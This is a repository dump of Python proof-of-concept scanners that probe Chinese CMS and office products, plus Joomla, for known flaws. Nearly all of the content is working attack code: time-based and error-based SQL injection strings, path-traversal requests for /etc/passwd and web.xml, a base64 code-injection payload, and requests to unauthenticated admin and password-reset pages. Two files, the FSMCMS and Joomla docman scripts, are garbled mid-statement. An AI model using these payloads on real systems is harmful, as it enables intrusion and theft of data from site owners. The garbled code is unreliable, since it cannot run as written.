https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/foosun/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/foosun/foosun_City_ajax_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Dotnetcms(风讯cms)SQL注入漏洞
5 | referer: https://silic.wiki/0day:%E9%A3%8E%E8%BF%85_dotnetcms_2.0-1.0_sql_injection
6 | author: Lucifer
7 | description: 文件City_ajax.aspx中,参数CityId存在SQL注入。
8 | '''
9 | import sys
10 | import time
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
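class foosun_City_ajax_sqli_BaseVerify:
    """Probe the `CityId` parameter of City_ajax.aspx with a time-based check.

    The request asks the database to wait six seconds; the check reports a
    hit when the whole request took at least that long. Timing is the only
    signal, so a slow or overloaded host produces false positives.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when the response took six seconds or more."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/user/City_ajax.aspx?CityId=1%27WAiTFoR%20DeLAy%20%270:0:6%27--"
        vulnurl = self.url + payload
        # monotonic() is immune to wall-clock adjustments (NTP, DST), which
        # could otherwise fake or hide the six-second delay.
        start_time = time.monotonic()
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): the measurement includes DNS, connect and transfer
            # time; repeat the request with a baseline before trusting a hit.
            if time.monotonic() - start_time >= 6:
                cprint("[+]存在Dotnetcms(风讯cms)SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")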
33 |
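if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = foosun_City_ajax_sqli_BaseVerify(sys.argv[1])
    testVuln.run()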
--------------------------------------------------------------------------------
/pocs/cms/fsmcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/fsmcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/fsmcms/fsmcms_setup_reinstall.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FSMCMS网站重装漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-043380
6 | author: Lucifer
7 | description: 东方文辉网站群内容管理系统FSMCMS网站重装漏洞,网站安装程序在安装之后默认没有删除,也没有限制,可以很容易的恶意把网站重装了。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
14 | class fsmcms_setup_reinstall_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/setup/index.jsp"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r'连接超时", "cyan")
32 |
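if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = fsmcms_setup_reinstall_BaseVerify(sys.argv[1])
    testVuln.run()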
37 |
--------------------------------------------------------------------------------
/pocs/cms/gobetters/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/gobetters/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/gowinsoft_jw/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/gowinsoft_jw/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/gpower/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/gpower/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/gpower/gpower_users_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 通元建站系统用户名泄露漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-059578
6 | author: Lucifer
7 | description: 未做权限过滤,可以显示所有用户的用户名
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
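class gpower_users_disclosure_BaseVerify:
    """Check whether /cms/system/selectUsers.jsp lists users without a login.

    The page is requested with no session; the check reports a hit when the
    body contains "totalProperty". A hit is reported as informational (green).
    """

    def __init__(self, url):
        # Base URL of the target; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Request the page anonymously and report when the marker appears."""
        payload = "/cms/system/selectUsers.jsp"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # NOTE(review): the marker is a single generic field name and the
            # status code is not checked; confirm a hit by reading the body.
            if "totalProperty" in req.text:
                cprint("[+]存在通元内容管理系统用户名泄露...(敏感信息)\tpayload: "+vulnurl, "green")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")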
29 |
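if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = gpower_users_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()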
--------------------------------------------------------------------------------
/pocs/cms/hanweb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/hanweb/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/hanweb/hanweb_downfile_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉downfile.jsp 任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-092339
6 | author: Lucifer
7 | description: 文件/vc/vc/columncount/downfile.jsp中,参数filename存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
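class hanweb_downfile_filedownload_BaseVerify:
    """Probe downfile.jsp for a path traversal in the `filename` parameter.

    The request asks for /etc/passwd through a relative path; the check
    reports a hit when the body contains both "root:" and "/bin/bash".
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when passwd-style content comes back."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): hosts where no account uses /bin/bash, and
            # non-Unix hosts, are missed by this pair of markers.
            if "root:" in req.text and "/bin/bash" in req.text:
                cprint("[+]存在大汉downfile.jsp 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")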
31 |
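if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = hanweb_downfile_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()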
--------------------------------------------------------------------------------
/pocs/cms/iGenus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/iGenus/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/iGenus/igenus_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: iGenus邮件系统一处无需登录的任意代码执行
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0156126
6 | author: Lucifer
7 | description: /home/webmail/igenus/include/login_inc.php base64编码未验证可写入shell
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
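class igenus_code_exec_BaseVerify:
    """Probe the `selTpl` parameter of iGenus index.php for code execution.

    The parameter carries a base64 value; the check reports a hit when the
    response contains the phpinfo() heading "Configuration File (php.ini)
    Path". A positive response therefore discloses the server's PHP
    configuration.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when phpinfo() output comes back."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?selTpl=YWF8YWFhJzsKcGhwaW5mbygpOyM="
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): the module docstring says the flaw writes to
            # login_inc.php; if so, this request may modify a file on the
            # target rather than only read from it - confirm before running.
            if "Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在igenus命令执行漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")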
31 |
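if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = igenus_code_exec_BaseVerify(sys.argv[1])
    testVuln.run()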
36 |
--------------------------------------------------------------------------------
/pocs/cms/iGenus/igenus_login_Lang_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: iGenus邮箱系统login.php 参数Lang任意文件读取
5 | referer: http://www.wooyun.org/bugs/WooYun-2015-136712
6 | author: Lucifer
7 | description: Lang存在遍历,%00截断。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
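class igenus_login_Lang_fileread_BaseVerify:
    """Probe the `Lang` parameter of iGenus login.php for a file read.

    The request asks for /etc/passwd through a relative path ending in a
    NUL byte; the check reports a hit when the body contains both "root:"
    and "/bin/bash".
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when passwd-style content comes back."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): hosts where no account uses /bin/bash, and
            # non-Unix hosts, are missed by this pair of markers.
            if "root:" in req.text and "/bin/bash" in req.text:
                cprint("[+]存在iGenus邮箱系统login.php 参数Lang任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")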
31 |
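if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = igenus_login_Lang_fileread_BaseVerify(sys.argv[1])
    testVuln.run()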
36 |
--------------------------------------------------------------------------------
/pocs/cms/inspur/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/inspur/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/iwms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/iwms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/iwms/iwms_bypass_js_delete.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: IWMS系统后台绕过&整站删除
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-085284
6 | author: Lucifer
7 | description: 禁用JS可越权查看文件目录,并人容易删除文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
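class iwms_bypass_js_delete_BaseVerify:
    """Check whether the IWMS admin file manager is served without a login.

    The page is requested with no session; the check reports a hit when the
    response is 200 and contains "btnCreateFolder". Only a GET is sent, so
    nothing is created or deleted by this check.
    """

    def __init__(self, url):
        # Base URL of the target; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Request the file manager anonymously and report when it renders."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/Admin/pages/fileManager.aspx?bp="
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # requests follows redirects by default, so a 200 here may be the
            # final page after a redirect - presumably a login page would not
            # contain the marker; confirm.
            if req.status_code == 200 and "btnCreateFolder" in req.text:
                cprint("[+]存在IWMS系统后台绕过&整站删除漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")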
31 |
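if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = iwms_bypass_js_delete_BaseVerify(sys.argv[1])
    testVuln.run()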
--------------------------------------------------------------------------------
/pocs/cms/jeecg/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/jeecg/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/jeecg/jeecg_pwd_reset.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: jeecg 重置admin密码
5 | referer: http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0121463.html
6 | author: Lucifer
7 | description: 未授权可访问初始化方法重置。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
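class jeecg_pwd_reset_BaseVerify:
    """Check whether jeecg's password-initialisation page is reachable.

    The check requests loginController.do?goPwdInit with no session and
    reports a hit when the body references "loginController.do?pwdInit".
    It does not log in, so the credentials printed in the hit message are
    not verified by this code.
    """

    def __init__(self, url):
        # Base URL of the target; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Request the page anonymously and report when the marker appears."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/loginController.do?goPwdInit"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): whether merely loading this page changes the admin
            # password cannot be told from this file - confirm before running
            # it against a production system.
            if "loginController.do?pwdInit" in req.text:
                cprint("[+]存在jeecg 重置admin密码漏洞...(高危)\tpayload: "+vulnurl+"\tadmin:123456", "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")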
31 |
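if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = jeecg_pwd_reset_BaseVerify(sys.argv[1])
    testVuln.run()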
36 |
--------------------------------------------------------------------------------
/pocs/cms/jeecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/jeecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/jeecms/jeecms_fpath_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: jeecms download.jsp 参数fpath任意文件下载
5 | referer: http://www.wooyun.org/bugs/WooYun-2014-77960
6 | author: Lucifer
7 | description: 文件download.jsp中,参数fpath存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
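class jeecms_fpath_filedownload_BaseVerify:
    """Probe jeecms download.jspx for an arbitrary file download via `fpath`.

    The request asks for WEB-INF/web.xml; the check reports a hit when the
    response Content-Type is exactly "application/xml". The body is not
    inspected.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and report when an XML content type comes back."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # NOTE(review): verify=False disables TLS certificate validation, so
            # the response can come from an interposed host.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() avoids a KeyError (previously reported as a timeout) when
            # the response has no Content-Type header.
            # NOTE(review): this is an exact match, so a header with a charset
            # parameter is missed, and any XML response counts as a hit
            # whatever it contains; confirm a hit by reading the body.
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在jeecms download.jsp 参数fpath任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
            # The message says "connection timeout" but covers any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")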
31 |
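if __name__ == "__main__":
    # Exit with a usage line instead of an IndexError when the URL is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base-url>")
    # Suppresses every warning category, including the one requests emits
    # for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = jeecms_fpath_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()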
--------------------------------------------------------------------------------
/pocs/cms/joomla/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/joomla/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/joomla/joomla_com_docman_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla组件com_docman本地文件包含
5 | referer: https://www.exploit-db.com/exploits/37620
6 | author: Lucifer
7 | description: joomla组件com_docman 文件com_docman/dl2.php中参数file被base64解码后可造成文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class joomla_com_docman_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA="
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"连接超时", "cyan")
31 |
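if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = joomla_com_docman_lfi_BaseVerify(sys.argv[1])
    testVuln.run()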
--------------------------------------------------------------------------------
/pocs/cms/joomla/joomla_index_list_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla 3.7.0 core SQL注入
5 | referer: https://www.08sec.com/bobao/15167.html
6 | author: Lucifer
7 | description: joomla!3.7.0新引入的一个组件”com_fields“,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入.
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
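class joomla_index_list_sqli_BaseVerify:
    """Probe a Joomla! site for the 3.7.0 com_fields SQL injection.

    A single GET request places an error-based expression in
    list[fullordering]; the site is reported when the MD5 of 1234 is
    reflected in the response body.
    """

    def __init__(self, url):
        # Base URL of the site under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Marker is md5("1234") without its last hex digit; presumably the
            # database error message truncates the value -- confirm.
            if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit, so a running scan could not be interrupted here.
            # The message still reads "connection timed out" for any failure.
            cprint("[-] "+__file__+"====>连接超时", "cyan")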
31 |
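if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = joomla_index_list_sqli_BaseVerify(sys.argv[1])
    testVuln.run()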
--------------------------------------------------------------------------------
/pocs/cms/jumboecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/jumboecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/kingdee/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/kingdee/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/kingdee/kingdee_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金蝶办公系统任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0150077
6 | author: Lucifer
7 | description: 金蝶协同办公系统/oa/fileDownload.do文件参数path未校验存在任意文件下载漏洞,导致泄露敏感信息
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
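class kingdee_filedownload_BaseVerify:
    """Check a Kingdee office system for arbitrary file download.

    Requests /oa/fileDownload.do with a path parameter pointing at
    WEB-INF/web.xml and reports the target when the response is served as
    application/xml.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding on an XML response.

        Returns None; output goes to the terminal through cprint.
        """
        payload = "/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # headers.get(): a response without Content-Type used to raise
            # KeyError, which the handler below reported as a timeout.
            # NOTE(review): header-only heuristic -- any endpoint answering
            # application/xml matches, and a value carrying a charset suffix
            # does not; confirm hits manually.
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在金蝶办公系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")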
29 |
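if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = kingdee_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()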
34 |
--------------------------------------------------------------------------------
/pocs/cms/kingdee/kingdee_logoImgServlet_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金蝶EAS任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-096179
6 | author: Lucifer
7 | description: 文件/portal/logoImgServlet中,参数type未过滤存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
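class kingdee_logoImgServlet_fileread_BaseVerify:
    """Check Kingdee EAS for arbitrary file read via /portal/logoImgServlet.

    The type parameter carries a traversal sequence to /etc/passwd; the
    target is reported when the response body looks like a passwd file.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when passwd content returns.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Both substrings must be present; a host whose root shell is not
            # /bin/bash will not match.
            if r"root:" in req.text and r"/bin/bash" in req.text:
                cprint("[+]存在金蝶EAS任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")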
31 |
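if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = kingdee_logoImgServlet_fileread_BaseVerify(sys.argv[1])
    testVuln.run()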
--------------------------------------------------------------------------------
/pocs/cms/kxmail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/kxmail/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/lbcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/lbcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/libsys/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/libsys/__init__.py
